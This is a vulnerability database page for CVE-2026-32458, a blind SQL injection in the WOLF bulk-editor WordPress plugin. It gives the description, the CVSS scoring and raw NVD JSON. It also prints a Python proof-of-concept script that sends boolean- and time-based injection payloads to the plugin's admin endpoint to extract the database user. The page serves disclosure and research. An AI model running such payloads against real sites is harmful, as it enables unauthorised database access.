Security Vulnerability Report
中文
CVE-2026-32458 CVSS 7.6 HIGH

CVE-2026-32458

Published: 2026-03-13 19:55:08
Last Modified: 2026-04-22 21:30:26

Description

Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') vulnerability in RealMag777 WOLF bulk-editor allows Blind SQL Injection.This issue affects WOLF: from n/a through <= 1.0.8.7.

CVSS Details

CVSS Score
7.6
Severity
HIGH
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:C/C:H/I:N/A:L

Configurations (Affected Products)

No configuration data available.

WOLF插件 <= 1.0.8.7

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
import requests import time target_url = "http://target-site.com/wp-admin/admin.php" # WOLF bulk-editor endpoint # Authentication required - high privilege user cookies = { 'wordpress_sec_xxx': 'your_auth_cookie' } def blind_sql_injection_test(): # Test payload for boolean-based blind SQL injection # Extracts database version character by character extracted_data = "" charset = 'abcdefghijklmnopqrstuvwxyz0123456789_-' for pos in range(1, 20): for char in charset: # Payload: extracts user() from database payload = f"1' AND (SELECT SUBSTRING(user(),{pos},1)='{char}') AND '1'='1" # Time-based variant (if boolean doesn't work) # payload = f"1'; SELECT CASE WHEN (SUBSTRING(user(),{pos},1)='{char}') THEN SLEEP(5) ELSE 0 END--" data = { 'action': 'wolf_bulk_edit', 'ids': payload, 'operation': 'update' } start = time.time() response = requests.post(target_url, data=data, cookies=cookies) elapsed = time.time() - start # Check response for successful injection if response.status_code == 200 and 'success' in response.text: extracted_data += char print(f"Extracted: {extracted_data}") break return extracted_data if __name__ == "__main__": print("Testing CVE-2026-32458 Blind SQL Injection") result = blind_sql_injection_test() print(f"Database user: {result}")

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2026-32458", "sourceIdentifier": "[email protected]", "published": "2026-03-13T19:55:08.040", "lastModified": "2026-04-22T21:30:26.497", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') vulnerability in RealMag777 WOLF bulk-editor allows Blind SQL Injection.This issue affects WOLF: from n/a through <= 1.0.8.7."}, {"lang": "es", "value": "Una vulnerabilidad de Neutralización Incorrecta de Elementos Especiales utilizados en un Comando SQL ('Inyección SQL') en el editor masivo RealMag777 WOLF permite Inyección SQL Ciega. Este problema afecta a WOLF: desde n/a hasta &lt;= 1.0.8.7."}], "metrics": {"cvssMetricV31": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:C/C:H/I:N/A:L", "baseScore": 7.6, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "HIGH", "userInteraction": "NONE", "scope": "CHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "NONE", "availabilityImpact": "LOW"}, "exploitabilityScore": 2.3, "impactScore": 4.7}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-89"}]}], "references": [{"url": "https://patchstack.com/database/Wordpress/Plugin/bulk-editor/vulnerability/wordpress-wolf-plugin-1-0-8-7-sql-injection-vulnerability?_s_id=cve", "source": "[email protected]"}]}}